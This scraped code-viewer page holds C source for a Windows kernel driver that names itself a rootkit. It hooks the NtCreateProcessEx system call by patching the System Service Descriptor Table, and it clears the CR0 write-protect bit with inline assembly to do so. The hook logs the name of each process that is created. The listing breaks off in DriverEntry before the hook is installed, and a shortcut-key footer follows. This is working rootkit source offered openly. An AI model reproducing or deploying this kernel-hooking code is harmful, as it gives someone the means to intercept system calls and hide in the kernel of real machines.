📄 783.html
字号:
// Length of process name (rounded up to next DWORD)<br />
#define PROCNAMELEN 20<br />
// Maximum length of NT process name<br />
#define NT_PROCNAMELEN 16<br />
ULONG gProcessNameOffset;<br />
<br />
void GetProcessNameOffset()<br />
{<br />
<br />
PEPROCESS curproc;<br />
int i;<br />
curproc = PsGetCurrentProcess();<br />
for( i = 0; i < 3*PAGE_SIZE; i++ ) <br />
{<br />
if( !strncmp( "System", (PCHAR) curproc + i, strlen("System") ))<br />
{<br />
gProcessNameOffset = i;<br />
}<br />
}<br />
}<br />
<br />
BOOL GetProcessName( PCHAR theName )<br />
{<br />
PEPROCESS curproc;<br />
char *nameptr;<br />
ULONG i;<br />
KIRQL oldirql;<br />
<br />
if( gProcessNameOffset ) <br />
{<br />
curproc = PsGetCurrentProcess();<br />
nameptr = (PCHAR) curproc + gProcessNameOffset;<br />
strncpy( theName, nameptr, NT_PROCNAMELEN );<br />
theName[NT_PROCNAMELEN] = 0; /* NULL at end */<br />
return TRUE;<br />
} <br />
return FALSE;<br />
}<br />
<br />
NTSTATUS NewNtCreateProcessEx(<br />
OUT PHANDLE ProcessHandle,<br />
IN ACCESS_MASK DesiredAccess,<br />
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,<br />
IN HANDLE ParentProcess,<br />
IN BOOLEAN InheritObjectTable,<br />
IN HANDLE SectionHandle OPTIONAL,<br />
IN HANDLE DebugPort OPTIONAL,<br />
IN HANDLE ExceptionPort OPTIONAL,<br />
IN HANDLE Unknown OPTIONAL)<br />
{<br />
CHAR aProcessName[PROCNAMELEN];<br />
<br />
GetProcessName( aProcessName );<br />
DbgPrint("rootkit: NewNtCreateProcessEx() from %s\n", aProcessName);<br />
//DbgPrint("ok");<br />
return OldNtCreateProcessEx(ProcessHandle,DesiredAccess,<br />
ObjectAttributes,ParentProcess,InheritObjectTable,SectionHandle,DebugPort,ExceptionPort,Unknown);<br />
}<br />
<br />
NTSTATUS<br />
OnStubDispatch(<br />
IN PDEVICE_OBJECT DeviceObject,<br />
IN PIRP Irp<br />
)<br />
{<br />
Irp->IoStatus.Status = STATUS_SUCCESS;<br />
IoCompleteRequest (Irp,<br />
IO_NO_INCREMENT<br />
);<br />
return Irp->IoStatus.Status;<br />
}<br />
<br />
VOID OnUnload( IN PDRIVER_OBJECT DriverObject )<br />
{<br />
DbgPrint("ROOTKIT: OnUnload called\n");<br />
<br />
_asm<br />
{<br />
CLI //dissable interrupt<br />
MOV EAX, CR0 //move CR0 register into EAX<br />
AND EAX, NOT 10000H //disable WP bit <br />
MOV CR0, EAX //write register back<br />
}<br />
<br />
(NTCREATEPROCESSEX)(*(((PServiceDescriptorTableEntry)KeServiceDescriptorTable)->ServiceTableBase + 0x32))=OldNtCreateProcessEx;<br />
<br />
_asm <br />
{<br />
MOV EAX, CR0 //move CR0 register into EAX<br />
OR EAX, 10000H //enable WP bit <br />
MOV CR0, EAX //write register back <br />
STI //enable interrupt<br />
}<br />
}<br />
<br />
NTSTATUS DriverEntry( IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING theRegistryPath )<br />
{<br />
int i;<br />
<br />
DbgPrint("My Driver Loaded!");<br />
GetProcessNameOffset();<br />
<br />
// Register a dispatch function<br />
for (i = 0; i < IRP_MJ_MAXIMUM_FUNCTION; i++) <br />
{<br />
theDriverObject->MajorFunction[i] = OnStubDispatch;<br />
}<br />
<br />
theDriverObject->DriverUnload = OnUnload; <br />
<br />
// save old system call locations<br />
//OldNtCreateProcessEx=(NTCREATEPROCESSEX)(SYSTEMSERVICE(0x32));<br />
OldNtCreateProcessEx=(NTCREATEPROCESSEX)(*(((PServiceDescriptorTableEntry)KeServiceDescriptorTable)->ServiceTableBase + 0x32));<br />
<br />
<br />
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -